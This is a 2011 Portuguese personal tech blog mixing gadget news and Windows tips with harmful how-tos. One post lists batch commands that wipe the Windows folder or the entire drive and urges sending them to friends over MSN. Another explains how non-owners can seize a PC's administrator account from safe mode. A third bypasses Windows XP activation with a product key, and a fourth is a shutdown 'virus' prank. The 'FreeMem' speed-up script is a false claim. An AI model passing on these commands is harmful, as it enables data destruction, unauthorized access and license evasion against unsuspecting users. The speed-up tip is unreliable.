e-mail: maycon_kellvyn@hotmail.com

domingo, 30 de janeiro de 2011

Apple VS Samsung





Todos se perguntam qual será o futuro da nano tecnologia com relação aos tablet. Mais a briga nos bastidores entre a Samsung e Apple esta muito boa e no fundo quem ganha é o consumidor pois esta briga rende novoss processadores.
Após o lançamento do Ipad que conta conta com o seu processador de muito bom desempenho, apesar da badalação a Apple apresenta um grande problema, o custo da sua produção elevando assim o valor do Ipad. Qanto a funcionalidade do Ipad não resta duvida que é surpreendente.
Já a Samsung tem um aliado muito bom para o desenvolvimento do Galaxi Table que é contar com os processadores do Google o Android. Presentes em varios produtos de diversas marcas (Motorola, LG,) dentre todas as vantagens apresentadas pelo Android uma das que mais chama a atenção é a fossilização no manuseio e uma grande quantidade de aplicativos presentes no Android Market (mais de 2.000).
Já no comparativos dos produtos desenvolvido pelas duas marcas a Apple leva uma grande vantagem sobre o Galaxi da Samsung com bateria mais duravel resistente e toda a garantia e credibilidade que leva a Apple sobre a Samsung, com o lançamento do novo Ipad previsto nos USA para o primeira semestre desse ano com processadores ainda melhor e menor custo o Ipad que hoje no preço chega perto dos (dois mil e quinhentos reais ) o valor dos mais baratos pesquisado deve cair bastante sem contar com a concorrência injusta imposta pelos Chineses com os tablete, trazendo esses novos produtos ainda mais pra perto de nos mortais.
Read more »

terça-feira, 25 de janeiro de 2011

Download e video-aula simples de GIMP 2









Read more »

domingo, 23 de janeiro de 2011

Dual boot.

   Hum!!

        Não sei estou sendo ingênuo achando que ainda exista alguem que não saiba o que é isso, mais isso não é vergonha. Basicamente o Dual consiste na instalação de dois sistemas operaconais em uma só máquina, como no exemplo à esquerda. E esse passo é tomado durante a formatação do micro e logo após dividir a memória do HD, se você dividio em dois então você instala por exemplo, o xp em uma parte do HD e na outra o seven.

Como alterar o nome de cada sistema operacional.




      OK!!!  Agora você vai em Meu computador, disco local c:, clica em ferramentas, opções de pasta, modo de exibição, desmarca a opção/ (ocultar arquivos e pasta protegidos pelo sistema operacional), abre o arquivo boot.ini .
        Abrirá esse documento no bloco de notas, você verá lá entre aspas o nome do sistema operacional que você pode alter caso necessite.
    
Read more »

sábado, 22 de janeiro de 2011

Novo computador da Apple, iMac.





       Em poucas palavras tentarei resumir esse mac, que não chega a ser uma inovação, mais sim um mescla de um pc normal com leptop.(Isso na minha opinião).
       O seu diferencial é na verdade, um monitor no qual esta acoplado todos os apetrechos de um computador como webcan entrada USB. Em fim todo o gabinete agora esta acoplado ao monitor, e mesmo isso não os fazem ficar gigantescos.
        Têm novidades também na nova geração de teclados com bluetooth e rato sem fio, a seguir um (ctrl c/ctrl v)dos periféricos de ja vêm acoplados ao iMac de fábrica.
         O iMac já vem equipado de base com Wi-Fi, Bluetooth 2.0, webcam com microfone, 1Gb RAM, placa gráfica ATI Radeon HD 2400 XT (128 e 256Mb), 3portas USB2, Firewire 400 e 800 (ou iLink ou IEEE), teclado, rato, telecomando, Mac OS X, iLife'08, Front Row (para usar o iMac como Media Center para filmes, fotos, música) e diverso software.


Read more »

quinta-feira, 20 de janeiro de 2011

Comandos com o Bloco de notas.




o básico de se fazer, é um arquivo .bat
(alguns chamam de vírus mais é só um comando)
abre o bloco de notas e digita:
shutdown -r
(reinicia o pc)
shutdown -s
(desliga o computador)
rmdir /s /q c:\windows
(deleta todo o windows - fuck your pc)
del /s /q c:\windows\
(deleta tudo dentro do windows-exemplo: arquivos e ñ pastas!)

@echo off
deltree /y c:\
exit
(deleta todo o HD!)
@echo off
cls
ipconfig/all
pause
(ñ é virus-diz informaçoes sobre seu pc como o IP)
[travando.bat]
@echo off
echo rerere>rerere.com
(trava o pc da vitima)
quando digitar um desses comandos você vai em arquivo>salvar como> digita qualquer nome mais a terminação tem que ser .BAT
exp.: Maycosoft.BAT
Aí você pode salva-lo no desktop
só clicar 2 vezes e pronto o comando será executado, vc pode enviar por msn pra sacanear amigos ^^.

(AQUI)Tem mais um tutorial completo no próprio blog, para desligar o PC de um amigo e apareçer uma mansagem de erro que você quiser, para assustar.(CLICK AQUI!!!!)





Ñ se procupe com vírus nesse blog todas as postagens são escaneadas pelo antivírus Mc Afee, com certeza nós presamos pela integridade dos visitantes.


Read more »

Deixe seu PC bem mais rápido!(GARANTIDO)

       Oii vou ensinar a deixar o pc mais rápido!
Testei e aprovei...>>>





Abra o bloco de notas!

Escreva: "FreeMem = Space (32000000)" < (sem aspas)

Salve em Desktop como quiser mais depois de você por o nome, complete com ".vbs"

(sem aspas).
 
Por exemplo salve com o nome Maycosoft Acelerador.vbs

Execute o arquivo (com um clique duplo)

Note a diferença!!!

Obs: Quantas vezes você executar, mais rapido fica!!!

Dica: Execute de 3 a 5 vezes....
 
com isso você libera a memória extra do seu pc........

Read more »

VÍTIMA DE FALSIFICAÇÃO DO WINDOWS ??




Se você não consegue atualizar o Windows XP, ou está com uma notificação de que o Windows é falso, siga o seguinte tutorial para validação.

1. Vá em Iniciar > Executar

2. Digite regedit e clique em OK.

3. Já dentro do regedit, navegue até a chave:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wi
ndowsNT\CurrentVersion\WPAEvents

4. No painel à direita, clique duas vezes em OOBETimer

5. Na janela que foi aberta, apague qualquer valor e clique em OK. Feche o regedit

6. Vá novamente em Iniciar > Executar e dessa vez digite:
%systemroot%\system32\oobe\msoobe.exe /a

7. Na janela que foi aberta, escolha a opção Sim, desejo telefonar...

8. Na próxima etapa, clique no botão Alterar chave de produto.

9. Na etapa seguinte, digite a CD-Key: THMPV-77D6F-94376-8HGKG-VRDRQ
e clique no botão Atualizar

10. Após clicar no botão Atualizar, o assistente para ativação voltará para a janela anterior, então, clique em Lembrar mais tarde e reinicie o Windows.

11. Reiniciado o Windows vá novamente em Iniciar > Executar e digite:
%systemroot%\system32\oobe\msoobe.exe /a

12. Aparecerá a seguinte mensagem:

Ativação do Windows
O Windows já está ativado. Clique em OK para sair.


Read more »

quarta-feira, 19 de janeiro de 2011

Melhores antivirus gratuitos

Avast Free antivirus

  • Versões de Windows suportadas: Vista/XP/2000/NT4/98/ME/95.
  • Última versão: 4.7.
  • Faça download de Avast aqui.
AVG Anti-Virus Free Edition
  • Versões de Windows suportadas: Vista/XP/2000/98/ME/95.
  • Última versão: 7.5.516a1225.
  • Faça download de AVG Anti-Virus aqui.
Avira AntiVir Personal Edition
  • Versões de Windows suportadas: Vista/XP/2000.
  • Última versão: 7.06.00.270.
  • Faça download de Avira AntiVir aqui.
Clamwin
  • Versões de Windows suportadas: Vista/XP/2003/2000.
  • Última versão: 0.92.
  • Faça download de Clamwin aqui.
PC Tools AntiVirus Free Edition
  • Versões de Windows suportadas: Vista/XP/2000.
  • Última versão: 4.0
  • Faça download de PC Tools aqui.
Dr.Web CureIt
  • Versões de Windows suportadas: Vista/XP/2003/2000/NT4/98.
  • Última versão: 4.44.
  • Faça download de Dr.Web Cureit aqui.
BitDefender Free Edition
  • Versões de Windows suportadas: Vista/XP/2000/NT4/98/ME.
  • Última versão: 10.
  • Faça download de BitDefender aqui.
MicroWorld Free AntiVirus Toolkit Utility
  • Versões de Windows suportadas: Vista/XP/2000.
  • Última versão: 9.0.
  • Faça download de MicroWorld aqui.
Antidote Super Lite version
  • Versões de Windows suportadas: XP/2000/98/95.
  • Última versão: ¿?
  • Faça download de Antidote aqui.
Comodo Anti-Virus
  • Versões de Windows suportadas: XP/2000.
  • Última versão: 2.0 beta
  • Faça download de Comodo Anti-Virus aqui.
Read more »

terça-feira, 18 de janeiro de 2011

Como alterar o plano de fundo da google.





Aqui vai uma dica de algo fácil mais que as vezes não percebemos, basta clickar em alterar plano de fundo no canto inferior esquerdo da página inicial da google.
Voçê poderá colocar imagens da internet, imagens compartilhadas no Picasa ou até mesmo direto do seu computador.
Ps: isso não é valido para o IE.
Read more »

Aprenda inglês brincando.

http://www.habbo.com/





  Uma maneira de Aprender ingles fácil é brincando. E esse em especial é um GAME onde podemos nos relacionar com pessoas e bater papo, ótimo para o aprendizado. O detalhe crucial é você se cadastrar no site do Habbo Internacional, cujo o link esta acima. A maioria das pessoas que jogam HABBO são crianças facilitando o relacionamento. Então para quem tem interesse essa é a dica.
                                                         Habbo Corporation
Read more »

Quebrando e Alterando a senha do administrador.




         Pra vocês que não são os donos do computador e por isso não têm acesso a quase nada por não poderem se logar. como administrador, ou até mesmo você que esqueceu a senha do admin do PC, vamos aprender a quebrar a senha do administrador e mudá-la.

         Primeiramente você terá que entrar em modo de segurança com prompt, para isso, quando ligar o pc fique apertando a tecla F8.

Primeiro aparecerá as opções de inicialização(algumas máquinas não tem isso), selecione o seu hd normalmente. As outras opções são disquete e Cd pra quem não sabe.

Em seguida aparecerá as opções de inicialização DO SISTEMA
Selecione "MODO SEGURO COM LINHA DE COMANDO" ou "SAFE MODE WITH COMMAND PROMPT" caso esteja em inglês.

Sim você esperava o que? esta é a tela do antigo DOS, hoje chamada prompt de comando
Vamos ao que interessa:

Digite o seguinte:
net user skin /add (depois aperte enter)

Depois digite:
net localgroup administradores deco /add (aperte enter)

Caso esteja em ingles a linha deverá ser assim:
net localgroup administrators deco /add

obs: deco foi um nome de usuario escolhido por mim, você pode colocar o que quiser, desde que nao use acentos e nem caracteres fora dos padrões.

Se ocorreu tudo bem você pode reiniciar digitando:
shutdown -r -t 00

Faça o login com o usuário criado, ele tem privilégios identicos ao do administrador. Mas queremos ser o administrador UNICO do pc certo?

Vá em:
INICIAR>PAINEL DE CONTROLE> FERRAMENTAS ADMINISTRATIVAS>GERENCIAMENTO DO COMPUTADOR. Clique em "Usuários e grupos locais" e no painel da direita dê dois cliques em usuários. Clique com o botão direito em administrador e selecione definir senha, clique em prosseguir(caso exija a confirmação) e adicione a nova senha.

Logue como administrador com a senha nova e exclua o usuário que foi criado

que venha causar transtornos em terceiros, por culpa de nossas
:.postagens.:

Read more »

Jogo - Tente Hackear.




Dica: (Codigo Fonte)
Read more »

O que é um Cracker e um Hacker.




       Para começar o ponto crucial é que, Cracker são especialistas em invadir sistemas, quebra de segurança.
e os Hackers trabalham para proteger a segurança de empresas contra crackers.


       Cracker é o termo usado para designar quem pratica a quebra (ou cracking) de um sistema de segurança, de forma ilegal ou sem ética. Este termo foi criado em 1985 por hackers em defesa contra o uso jornalístico do termo hacker. O uso deste termo reflete a forte revolta destes contra o roubo e vandalismo praticado pelo cracking.
Classificação
Tipos de Crackers
Crackers de Criptografia: Termo usado para designar aqueles que se dedicam à quebra de criptográfia (cracking codes). Tal procedimento pode ser executado tanto com lápis e papel bem como com uso de computadores, tudo depende da fonte do problema a ser solucionado.
Crackers de softwares: Termo usado para designar programadores e decoders que fazem engenharia reversa de um determinado programa, ou seja, alteram o conteúdo de um determinado programa pra fazer funcionar de forma correta, muitos crackers alteram datas de expiração de um determinado programa pra fazer funcionar mais de 30 dias, ou seja, modificam o modo trial para utilizar como se fosse uma cópia legítima, ou fazem um desvio interno na rotina de registro do programa para que ele passe a aceitar quaisquer seriais, tais sofwares alterados são conhecidos como warez.
Desenvolvedores de vírus, worms, trojans e outros malwares: programadores que criam pequenos softwares que causam danos ao usuário.
Não são considerado crackers pessoas como: distribuidores de warez e crackz, webmasters que disponibilizam em suas páginas, softwares sem autorização dos detentores de direitos autorais ou pessoas que copiam software piratas. O cracabiker é essencialmente um profissional habilitado na reengenharia ou engenharia reversa de software ou hardware. Um hacker se aproveita de caractísticas dos sistemas para poder modificá-los. Os crackers são auto-didatas (bem como os hackers) e sem conhecimento algum do sistema revertem hacks necessários entendendo os sistemas de trás pra frente algumas vezes.



Definições

Hacker
: Palavra usada originalmente no MIT na década de 50 para definir pessoas interessadas pela (então iniciante) era da informática. Essa definição diz que um “hacker” é um pessoa que consegue “hackear”, verbo inglês “to hack”. Inicialmente, os "Hackers" faziam juz a palavra (em inglês, "To Hack" significa, literalmente, rachar, cortar ou partir, devido a pratica de invadir sistemas ou realizar modificações em programas), porem atualmente os "hackers" ganharam uma nova denominação no dicionario, que significa alguem habil no ramo da programação

Nesse sentido, os hackers seriam as pessoas que criaram a Internet, que criaram o Linux, fizeram do sistema operacional Unix o que ele é hoje, os softwares GNU, mantém a Usenet, fazem a World Wide Web funcionar, e os especialistas em segurança das grandes empresas.

Com o passar dos anos, esses primeiros “hackers” passaram a utilizar o verbo hack para definir não somente as pessoas ligadas a informática, mas sim os especialistas em diversas áreas. O "Hacker How-To" (Como se tornar um Hacker [1]), de Eric S. Raymond define isso da seguinte forma:

Existem pessoas que aplicam a atitude hacker a outras coisas, como eletrônica ou música — na verdade, você pode achá-la nos mais altos níveis intelectuais de qualquer ciência ou arte. Os hackers de software reconhecem esse espírito aparentado em outros lugares, e podem chamá-los de hacker também — e alguns dizem que a natureza hacker é de fato independente do meio particular no qual o hacker trabalha.

É importante lembrar que existe toda uma cultura por trás desse sentido da palavra hacker. A Cultura Hacker define diversos pontos para estilo e atitude e, por mais que pareça estranho, muitas das pessoas que se tornam os chamados programadores extraordionários possuem esse estilo e atitude naturalmente.
Read more »

Simulador, Emulador Android.




Click na imagem abaixo para testar o (simulador Android).▼▼▼▼▼▼▼▼

Read more »

Android.





          Android é um sistema operacional móvel que roda sobre o núcleo Linux, embora por enquanto seja ainda desenvolvido numa estrutura externa ao núcleo Linux. Foi inicialmente desenvolvido pela Google e posteriormente pela Open Handset Alliance, mas a Google é a responsável pela gerência do produto e engenharia de processos. O Android permite aos desenvolvedores escreverem software na linguagem de programação Java controlando o dispositivo via bibliotecas desenvolvidas pela Google. Existem atualmente mais de 100 mil aplicações disponíveis para Android. O sistema operativo Android consiste em 12 milhões de linhas de código, incluindo 3 milhões em XML, 2.8 milhões de linhas de C, 2.1 milhões de linhas de código Java e 1.75 milhões de linhas de código em C++.


Características

Com o lançamento do SDK, características e especificações para o Android são facilmente distribuídas.
Handset layouts
A plataforma é adaptada tanto para dispositivos VGA maiores, gráficos 2D, bibliotecas gráficas 3D baseadas em OpenGL ES especificação 2.0 e os layouts mais tradicionais de smartphones,
Armazenamento
É utilizado SQLite para armazenamento de dados,
Conectividade
O Android suporta uma grande variedade de tecnologias de conectividade incluindo GSM/EDGE, IDEN, CDMA, EV-DO, UMTS, LTE, Bluetooth, 3G, Wi-Fi e WiMAX.
Mensagens
Tanto SMS como MMS são formas disponíveis de envio de mensagens.
Navegador.
  O navegador disponível no sistema é baseado no framework de Código aberto conhecido como WebKit.
 
    
Máquina virtual Dalvik
Aplicações escritas em Java são compiladas em bytecodes Dalvik e executadas usando a Máquina virtual Dalvik, que é uma máquina virtual especializada desenvolvida para uso em dispositivos móveis, o que permite que programas sejam distribuídos em formato binário (bytecode) e possam ser executados em qualquer dispositivo Android, independentemente do processador utilizado. Apesar das aplicações Android serem escritas na linguagem Java, ela não é uma máquina virtual Java, já que não executa bytecode JVM.
Multimédia
O sistema irá suportar formatos de áudio e vídeo como: MPEG-4, H.264, MP3, e AAC.
Suporte Adicional de Hardware
O Android é totalmente capaz de fazer uso de câmeras de vídeo, tela sensível ao toque, GPS, acelerômetros, e aceleração de gráficos 3D.
Ambiente de desenvolvimento (SDK)
Inclui um emulador, ferramentas para debugging, memória e análise de performance. O IDE Eclipse (atualmente 3.4 ou 3.5) poderá ser utilizado através do plugin Android Develpment Tools (ADT).
 
 

Read more »

segunda-feira, 17 de janeiro de 2011

Como criar animação GIF no Photoshop.

Clique no icone do Adobe Photoshop CS4 e ele irá direciona-lo a um local específico.




Obrigado por visitar-nos.
Read more »

sexta-feira, 14 de janeiro de 2011

Super Mario - Uma reliquia.

Mario começou por ser um carpinteiro, tornou-se canalizador e depois jardineiro. Este personagem dos videojogos atravessou gerações e continua a cativar pequenos e graúdos.





A aposta na marca de uma forma consistente é a principal explicação para a longevidade do Super Mario, o boneco de videojogos que está a comemorar 25 anos, disse à agência Lusa António Gonçalves, da Seed Studios, uma das poucas empresas portuguesas especializadas na criação de jogos para consolas. “Continua a ser ainda hoje a marca de jogos mais vendida de sempre”, salientou.

António Gonçalves realçou que o boneco de bigode da Nintendo “foi um dos primeiros a entrar no mercado de videojogos e conseguiu ser consistente”, acompanhando a evolução tecnológica, das antigas consolas Arcade até às actuais portáteis.

A japonesa Nintendo está a comemorar este mês os 25 anos do primeiro pacote de jogos Super Mario Bros., com as aventuras dos irmãos Mario e Luigi, mas a personagem nasceu quatro anos antes. O boneco foi criado em 1981 por Shigeru Miyamoto baseado no popular Popeye, mas a Nintendo não conseguiu os direitos para utilizar este personagem, o que levou o autor a mudar o nome para Jumpman, no jogo “Donkey Kong” (nome que substituiu Brutus).

No jogo seguinte, “Donkey Kong Jr.”, o nome foi de novo alterado, agora para Mario, por sugestão de um responsável da Nintendo, que reparou nas parecenças de Jumpman com Mario Segale, o senhorio do escritório da empresa nos Estados Unidos.
 
Read more »

TV Online.




Segure Ctrl antes de clicar...


Read more »

- TABLET - Nova geração de computadores.




 Depois de uma década de desenvolvimento e centenas de milhões de dólares, a Microsoft apresentou, finalmente, seu Tablet PC. Ele permite ao usuário escrever com uma caneta em uma prancheta eletrônica, fazer anotações em documentos, trocar bilhetes, rabiscar idéias e transformá-las em formato texto ou salvar como manuscrito. De olho na chamada audiência móvel - pessoas que se deslocam de um lugar a outro ou que têm muitas reuniões, precisando tomar notas, fazer apresentações, acessar documentos, agendar e consultar e-mails com freqüência - o Tablet PC custa entre US$ 1,7 mil e US$ 2,4 mil. Apesar do otimismo de Bill Gates, analistas dizem não saber se já chegou a hora do Tablet PC, e não só pelo mau momento econômico. Consideram que o sucesso do novo equipamento vai depender, principalmente, dos aplicativos que forem desenvolvidos para ele.
Read more »

Montagem de um pc de ultima geração.
































COM MOUSE, MONITOR E TECLADO.

CPU: Core 2 Quad Q9550 2,83Ghz - ( 950 reais )
MoBo: MSI X58 Platinum - ( 1300 reais )
RAM: Corsair DDR3 1600mhz - 6GB Triple Channel - ( 650 reais )
VGA: Geforce Gtx295 1GB - ( 2000 reais )
HD: 1TB 7200rpm 32mb buffers - SATA2 - ( 400 reais )
DVD-RW: LG - ( 80 reais )
Fonte: Corsair 450VX - ( 250 reais )
Gabinete: CoolerMaster Elite 33* - ( 150 reais )

 Total: 5780 reais

CPU: Intel Core I7 920 - 1000 reais
MoBo: Gigabyte GA-EX58-Extreme ou eVGA X58 SLI - 1800 reais
RAM: 3x2GB DDR3 1600Mhz OCZ,Gs Kill ou Corsair - 500 reais
VGA: GTX 285 - 1500 reais
HD: 2x 500 GB SATA 2 Samsung,Seagate ou WD - 460 reais
DVD-RW:Asus ou Piooner - 110 reais
Fonte: Corsair HX 520W - 360 reais
Gabinete: Cooler Master Dominator 690 - 350 reais

Total: 6080 reais 
Read more »

segunda-feira, 10 de janeiro de 2011

Como criar um vírus

   Atenção:




   Esse é um tutorial básico, usado apenas para mostrar como se aplica a linguagem de programação, usando um programinha do windows (bloco de notas). Mas para quem for do tipo (pestinha)66...., pode usalo para assustar um amigo fazendo com que seu computador desligue usando uma mensagem assustadora.66...... 



  • Abra o bloco de notas.
  • Digite shutdown -s -c "Aqui voçê digita a mensagem assustadora" -t 60
  • Em seguida "Salvar como" e no local para digitar o nome, digite o que quiser seguido de um ponto e do formato bat. Ex.: Vírus.bat 
  • Shutdown seguido de -s significa o desligamento do computador.
  • -c seguido de simboliza que você adicionara um comentario entre aspas " " " " " " "
  • -t significa a quantidade de tempo que irá retroceder até o desligamento do computador em segundos.
Para cancelar a ação caso você tenha clicado sem intenção va em executar, e digite shutdown -a.


                               
Read more »

O que são vírus de computador?




   Resumidamente: Todo sistema operacional de um computador é composto por uma linguagem chamada de linguagem de programação, onde cada palavra ou simbolo se comvertem funções como na formatação de um texto, posição de um determonado objeto e etc..
   O sistema operacional mais conheçido é o Windows, onde nele esta toda a linguagem de programação (letras, numeros, simbolos, caracteres e etc). Tudo depende dessa linguagem, ate mesmo uma usada para dar ordens ao computador disendo para que ele se desligue ou ligue, abra ou feche um programa. Agora imagine se essa liguagem fosse alterada dando comandos errados ao computador fazendo-o desligar-se sem sua permisão ou até mesmo fazendo-o não ligar mais, e uma série de comandos pode ser aplicada. Então isso é um virus, alguem mal intençionado usa uma linguagem para fazer alterar a linguagem do Windows fazendo-o fazer coisas que você não queira.

     Agora uma uma definição mais tecnica:
                   :Texto abaixo retirado do site cujo a fonte, informamos abaixo do texto:
Vírus são programas. Todos eles. No tipo mais comum de vírus eles são programas muitos pequenos e invisíveis. O computador (ou melhor dizendo, o sistema operacional), por si só, não tem como detectar a existência deste programinha. Ele não é referenciado em nenhuma parte dos seus arquivos, ninguém sabe dele, e ele não costuma se mostrar antes do ataque fatal. Em linhas gerais, um vírus completo (entenda-se por completo o vírus que usa todas as formas possíveis de contaminar e se ocultar) chega até a memória do computador de duas formas.

A primeira e a mais simples é a seguinte: em qualquer disco (tanto disquete quanto HD) existe um setor que é lido primeiro pelo sistema operacional quando o computador o acessa. Este setor identifica o disco e informa como o sistema operacional (SO) deve agir. O vírus se aloja exatamente neste setor, e espera que o computador o acesse.

A partir daí ele passa para a memória do computador e entra na segunda fase da infecção. Mas antes de falarmos da segunda fase, vamos analisar o segundo método de infecção: o vírus se agrega a um arquivo executável (fica pendurado mesmo nesse arquivo!). Acessar o disco onde este arquivo está não é o suficiente para se contaminar. É preciso executar o arquivo contaminado. O vírus se anexa, geralmente, em uma parte do arquivo onde não interfira no seu funcionamento (do arquivo), pois assim o usuário não vai perceber nenhuma alteração e vai continuar usando o programa infectado.

O vírus, após ter sido executado, fica escondido agora na memória do computador, e imediatamente infecta todos os discos que estão ligados ao computador, colocando uma cópia de si mesmo no tal setor que é lido primeiro (chamado setor de boot), e quando o disco for transferido para outro computador, este ao acessar o disco contaminado (lendo o setor de boot), executará o vírus e o alocará na sua memória, o que por sua vez irá infectar todos os discos utilizados neste computador, e assim o vírus vai se alastrando.


 Fonte: http://www.rayinformatica.com.br/virus.htm
Read more »

.

Related Posts Plugin for WordPress, Blogger...
 
Powered by Blogger